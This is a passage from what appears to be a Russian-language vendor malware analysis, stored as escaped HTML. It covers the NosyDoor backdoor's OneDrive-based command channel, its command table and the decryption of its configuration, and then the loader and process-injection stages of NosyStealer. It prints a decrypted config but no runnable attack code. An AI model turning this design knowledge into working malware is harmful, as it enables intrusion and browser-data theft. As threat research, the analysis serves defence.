NosyDoor \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435, \u043e\u043d \u0438\u0449\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442 C&amp;C \u0432 \u0444\u0430\u0439\u043b\u0430\u0445 \u0437\u0430\u0434\u0430\u0447 \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c <span>.max<\/span> \u0432 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435:<\/p>\n<p><span>&lt;FolderName&gt;-&lt;ListenerID&gt;\/&lt;agent_id&gt;\/&lt;Payload.TaskFolderName&gt;<\/span><\/p>\n<p>\u041a\u0430\u0436\u0434\u044b\u0439 \u0444\u0430\u0439\u043b \u0437\u0430\u0434\u0430\u0447\u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u043d\u043a\u0430\u043f\u0441\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f\u043c\u0438, \u0432\u0437\u044f\u0442\u044b\u043c\u0438 \u0438\u0437 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u0430:<\/p>\n<p><span>&lt;Payload.Prepend&gt;&lt;Payload.PayloadPrepend&gt;<span>&lt;encrypted_command&gt;<\/span><span>&lt;Payload.PayloadAppend&gt;&lt;Payload.Append&gt;<\/span><\/span><\/p>\n<p>\u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u0437\u0430\u0442\u0435\u043c \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e base64 \u0438 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e AES \u0441 \u043a\u043b\u044e\u0447\u043e\u043c <span>&lt;Payload.Key&gt;<\/span> \u0438 \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 <span>0<\/span>. \u0412\u0441\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u043f\u0438\u0441\u0430\u043d\u044b \u0432 \u0422\u0430\u0431\u043b\u0438\u0446\u0435 2. \u0425\u043e\u0442\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 <span>CMD_TYPE_TASKSCHEDULER<\/span> \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u0430 \u0432 \u043a\u043e\u0434\u0435, \u043e\u043d\u0430 \u043d\u0435 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u043d\u0438 \u0432 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0445 \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u0432.<\/p>\n<p><em>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 2. \u041a\u043e\u043c\u0430\u043d\u0434\u044b, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 NosyDoor<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"198\"><strong>\u041a\u043e\u043c\u0430\u043d\u0434\u0430<\/strong><\/td>\n<td width=\"444\"><strong>\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_SHELL<\/span><\/td>\n<td width=\"444\">\u0412\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_EXEC_ASM<\/span><\/td>\n<td width=\"444\">\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0441\u0431\u043e\u0440\u043a\u0443 .NET.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_EXIT<\/span><\/td>\n<td width=\"444\">\u0412\u044b\u0439\u0442\u0438 \u0438\u0437 NosyDoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_REMOVE<\/span><\/td>\n<td width=\"444\">\u0423\u0434\u0430\u043b\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u0438 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0438\u0442\u044c \u0435\u0433\u043e \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_DOWNLOAD<\/span><\/td>\n<td width=\"444\">\u0418\u0437\u0432\u043b\u0435\u0447\u044c \u0444\u0430\u0439\u043b. \u041e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u0432\u044b\u0433\u0440\u0443\u0437\u043a\u0438 \u0437\u0434\u0435\u0441\u044c \u043d\u0430\u0437\u0432\u0430\u043d\u044b \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e, \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u044f C&amp;C-\u043c\u0430\u0448\u0438\u043d\u0443 \u043a\u0430\u043a \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0443\u044e, \u0430 \u043c\u0430\u0448\u0438\u043d\u0443 \u0436\u0435\u0440\u0442\u0432\u044b \u2014 \u043a\u0430\u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u0443\u044e.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_UPLOAD<\/span><\/td>\n<td width=\"444\">\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0443 \u0436\u0435\u0440\u0442\u0432\u044b, \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0435\u0433\u043e \u0438\u0437 OneDrive \u0438 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0438\u0442\u044c \u043a\u0430\u0442\u0430\u043b\u043e\u0433, \u043a\u0443\u0434\u0430 \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0444\u0430\u0439\u043b.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_DRIVES<\/span><\/td>\n<td width=\"444\">\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u043c\u0435\u043d\u0430 \u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u044b \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0434\u0438\u0441\u043a\u043e\u0432, \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_FILE_BROWSE<\/span><\/td>\n<td width=\"444\">\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0437\u043d\u0430\u0447\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_SLEEP<\/span><\/td>\n<td width=\"444\">\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0438\u043d\u0442\u0435\u0440\u0432\u0430\u043b \u043c\u0430\u044f\u043a\u0430.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_TASKSCHEDULER<\/span><\/td>\n<td width=\"444\">\u041d\u0435 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043e.<\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><span>CMD_TYPE_Plugin<\/span><\/td>\n<td width=\"444\">\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0441\u0431\u043e\u0440\u043a\u0443 .NET, \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0432\u044b\u0437\u044b\u0432\u0430\u044f \u043c\u0435\u0442\u043e\u0434 <span>Plugin.Run<\/span>.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b NosyDoor \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u0435 \u0448\u0430\u0433\u0438 \u2014 \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0432\u044b\u0432\u043e\u0434 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e AES, \u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442 \u0432 base64 \u0438 \u0438\u043d\u043a\u0430\u043f\u0441\u0443\u043b\u0438\u0440\u0443\u0435\u0442 \u0441\u0442\u0440\u043e\u043a\u0430\u043c\u0438 <span>&lt;Payload.Prepend&gt;&lt;Payload.PayloadPrepend&gt;<\/span> \u0438 <span>&lt;Payload.PayloadAppend&gt;&lt;Payload.Append&gt;<\/span>. \u041a\u0430\u0436\u0434\u044b\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u0430 C&amp;C-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0432 \u0444\u0430\u0439\u043b\u0435 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u0444\u0430\u0439\u043b\u0430, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u043c \u043c\u0435\u0441\u0442\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f (Unix timestamp, \u0443\u043c\u043d\u043e\u0436\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 100 000), \u0438 \u0437\u0430\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c <span>.max<\/span>:<\/p>\n<p><span>&lt;FolderName&gt;-&lt;ListenerID&gt;\/&lt;agent_id&gt;\/&lt;Payload.ReceiveFolderName&gt;\/&lt;unix_timestamp&gt;.max<\/span><\/p>\n<p>\u0415\u0441\u043b\u0438 \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0431\u043e\u0442\u044b NosyDoor \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435, \u0431\u044d\u043a\u0434\u043e\u0440 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043e\u0431 \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043c\u0435\u0441\u0442\u043d\u044b\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c \u0432 <span>C:UsersPublicLibrariesthomas.log<\/span>.<\/p>\n<p>\u0411\u044d\u043a\u0434\u043e\u0440 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0443\u044e \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <span>Library<\/span>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u0430 \u043a\u0430\u043a \u0440\u0435\u0441\u0443\u0440\u0441 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c <a href=\"https:\/\/github.com\/Fody\/Costura\">Costura<\/a>. \u041e\u043d\u0430 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043a\u043e\u0434, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0439 \u0441 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434, \u0441\u0432\u044f\u0437\u044c\u044e \u0441 Microsoft OneDrive \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c\u0438 \u0432\u0441\u043f\u043e\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043c\u0435\u0442\u043e\u0434\u0430\u043c\u0438, \u0432 \u0442\u043e \u0432\u0440\u0435\u043c\u044f \u043a\u0430\u043a \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0446\u0438\u043a\u043b \u043c\u0430\u044f\u043a\u0430 \u0438 \u0447\u0438\u0442\u0430\u0435\u0442 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443.<\/p>\n<p>\u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0432 \u0444\u0430\u0439\u043b\u0435 <span>log.cached<\/span> \u0432 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0432\u0438\u0434\u0435. NosyDoor \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0435\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e XOR \u0441 \u043a\u043b\u044e\u0447\u043e\u043c <span>SecretKey<\/span>, \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442 \u0438\u0437 base64, \u0437\u0430\u0442\u0435\u043c \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e AES \u0441 \u043a\u043b\u044e\u0447\u043e\u043c <span>Thomas<\/span>, \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u043d\u044b\u043c \u043d\u0443\u043b\u0435\u0432\u044b\u043c\u0438 \u0431\u0430\u0439\u0442\u0430\u043c\u0438 \u0434\u043e \u0434\u043b\u0438\u043d\u044b 16, \u0438 IV <span>0<\/span>. \u042d\u0442\u0443 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043d\u0430 \u0420\u0438\u0441\u0443\u043d\u043a\u0435 4.<\/p>\n<pre><code>{ \"ListenerID\": 3, \"FolderName\": \"Duis euismod, mi, ligula, mattis feugiat, pulvinar.\", \"AppID\": \"[redacted]\", \"RefreshToken\": \"[redacted]\", \"BaseUrl\": \"https:\/\/graph.microsoft.com\/v1.0\/drive\", \"TokenUrl\": \"https:\/\/login.microsoftonline.com\/common\/oauth2\/v2.0\/token\", \"CodeType\": \".NET40\", \"AgentType\": \"OneDrive\", \"Scope\": \"offline_access files.readwrite\", \"Sleep\": 66, \"BeginDate\": \"08:51:00\", \"EndDate\": \"18:51:00\", \"Payload\": { \"Key\": \"583oq23aonxloet7\", \"MetaDataName\": null, \"TaskFolderName\": \"Risus blandit mattis\", \"ReceiveFolderName\": \"Felis posuere at\", \"Prepend\": \"&lt;!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD XHTML 1.0 Strict\/\/EN\" \"http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-strict.dtd\"&gt; &lt;html xmlns=\"http : \/\/www.w3.org\/1999\/xhtml\"&gt; &lt;head&gt; &lt;meta http-equiv=\"Content-Type\" content=\"text\/html; charset=iso-8859-1\" \/&gt; &lt;title&gt;IIS Windows Server&lt;\/title&gt; &lt;style type=\"text\/css\"&gt; &lt;!-- body { color:#000000; background-color:#0072C6; margin:0; } #container { margin-left:auto; margin-right:auto; text-align:center; } a img { border:\", \"Append\": \"; } --&gt; &lt;\/style&gt; &lt;\/head&gt; &lt;body&gt; &lt;div id=\"container\"&gt; &lt;a href=\"http:\/\/go.microsoft.com\/fwlink\/?linkid=66138u0026amp;clcid=0x409\"&gt;&lt;img src=\"iisstart.png\" alt=\"IIS\" width=\"960\" height=\"600\" \/&gt;&lt;\/a&gt; &lt;\/div&gt; &lt;\/body&gt; &lt;\/html&gt;\", \"PayloadPrepend\": \"Fames\", \"PayloadAppend\": \"Ipsum\" } }<\/code><\/pre>\n<p><em>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 4. \u0420\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f (<\/em><span>log.cached<\/span><em>, \u0444\u043e\u0440\u043c\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f)<\/em><\/p>\n<p>\u0417\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 <span>&lt;BeginDate&gt;<\/span> \u0438 <span>&lt;EndDate&gt;<\/span> \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u044e\u0442 \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d \u043c\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438, \u043a\u043e\u0433\u0434\u0430 NosyDoor \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 NosyDoor \u0430\u043a\u0442\u0438\u0432\u0435\u043d \u0442\u043e\u043b\u044c\u043a\u043e \u0441 8:51 \u0434\u043e 18:51. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 NosyDoor \u0431\u0443\u0434\u0435\u0442 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u043e\u0447\u0435\u0440\u0435\u0434\u0438, \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u043e\u0442\u0432\u0435\u0442\u043e\u0432 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0432\u0440\u0435\u043c\u0435\u043d\u0438.<\/p>\n<h3>NosyStealer<\/h3>\n<p>NosyStealer \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0438\u0437 Microsoft Edge \u0438 Google Chrome. \u041a\u0430\u043a \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e \u043d\u0430 \u0420\u0438\u0441\u0443\u043d\u043a\u0435 5, \u043e\u043d \u0438\u043c\u0435\u0435\u0442 \u0447\u0435\u0442\u044b\u0440\u0435\u0445\u044d\u0442\u0430\u043f\u043d\u0443\u044e \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u043f\u0440\u0438\u0447\u0435\u043c \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442 \u043a\u0440\u0430\u0436\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u044d\u0442\u0430\u043f\u0430.<\/p>\n<figure><img decoding=\"async\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 5. \u0426\u0435\u043f\u043e\u0447\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f NosyStealer )2)\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-5-1.png\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 5. \u0426\u0435\u043f\u043e\u0447\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f NosyStealer\" width=\"\"><figcaption><em>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 5. \u0426\u0435\u043f\u043e\u0447\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f NosyStealer<\/em><\/figcaption><\/figure>\n<h4>\u042d\u0442\u0430\u043f 1 NosyStealer \u2013 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a DLL<\/h4>\n<p>\u041f\u0435\u0440\u0432\u044b\u0439 \u044d\u0442\u0430\u043f (<span>pmp.exe<\/span>) \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 NosyStealer \u2014 \u044d\u0442\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 C\/C++. \u041d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0439 \u043e\u0431\u0440\u0430\u0437\u0435\u0446 \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c <span>SERV.dll<\/span> \u0441 \u0434\u0438\u0441\u043a\u0430 \u0438 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0438\u0440\u0443\u0435\u043c\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e <span>Hello<\/span>.<\/p>\n<h4>\u042d\u0442\u0430\u043f 2 NosyStealer \u2013 \u0438\u043d\u044a\u0435\u043a\u0442\u043e\u0440<a><\/a><\/h4>\n<p>\u041c\u044b \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438 \u0434\u0432\u0430 \u043e\u0431\u0440\u0430\u0437\u0446\u0430 \u042d\u0442\u0430\u043f\u0430 2 NosyStealer \u2014 \u043e\u0434\u0438\u043d (<span>SERV.dll<\/span>) \u0432 \u043d\u0430\u0448\u0435\u0439 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438, \u0430 \u0434\u0440\u0443\u0433\u043e\u0439 (<span>msi.dll<\/span>) \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u043d\u0430 <a href=\"https:\/\/www.virustotal.com\/gui\/file\/5959d4414cc6764212679eec7c9ed5911eed6d24f310bc7b9ba570e11b84be8f\">VirusTotal<\/a> \u0438\u0437 \u041c\u0430\u043b\u0430\u0439\u0437\u0438\u0438. \u041d\u0438 \u043e\u0434\u0438\u043d \u0438\u0437 \u043d\u0438\u0445 \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 <span>Hello<\/span>, \u043d\u043e \u043e\u0431\u0430 \u0438\u043c\u0435\u044e\u0442 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043a\u043e\u0434 \u0432 <span>DllMain<\/span>, \u0442\u043e \u0435\u0441\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 DLL. \u041e\u043d\u0438 \u0438\u043c\u0435\u044e\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u044b:<\/p>\n<ul>\n<li><span>??0Cv2dllnoinject@@QEAA@XZ<\/span><\/li>\n<li><span>??4Cv2dllnoinject@@QEAAAEAV0@$$QEAV0@@Z<\/span><\/li>\n<li><span>??4Cv2dllnoinject@@QEAAAEAV0@AEBV0@@Z<\/span><\/li>\n<li><span>?fnv2dllnoinject@@YAHXZ<\/span><\/li>\n<li><span>?nv2dllnoinject@@3HA<\/span><\/li>\n<\/ul>\n<p>\u0414\u0430\u043d\u043d\u044b\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u044d\u0442\u0430\u043f\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442\u0441\u044f \u0438\u0437 \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0443\u0442\u0438 <span>C:ProgramDataMicrosoftWDFMDE.dat<\/span>. \u041e\u043d\u0438 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0434\u043d\u043e\u0431\u0430\u0439\u0442\u043e\u0432\u043e\u0433\u043e XOR-\u0448\u0438\u0444\u0440\u0430 \u0441 \u043a\u043b\u044e\u0447\u043e\u043c <span>0x7A<\/span>. \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u043c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u0435\u043b\u043b\u043a\u043e\u0434 <a href=\"https:\/\/github.com\/TheWover\/donut\">Donut<\/a>, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u043d\u0435\u0434\u0440\u044f\u0435\u0442\u0441\u044f \u0432 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 <span>pmp.exe<\/span> (\u042d\u0442\u0430\u043f 1 NosyStealer) \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c API <span>CreateRemoteThread<\/span> \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 <span>SERV.dll<\/span>, \u0438 \u0432 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 <span>notepad.exe<\/span> \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c API <span>SetThreadContext<\/span> \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 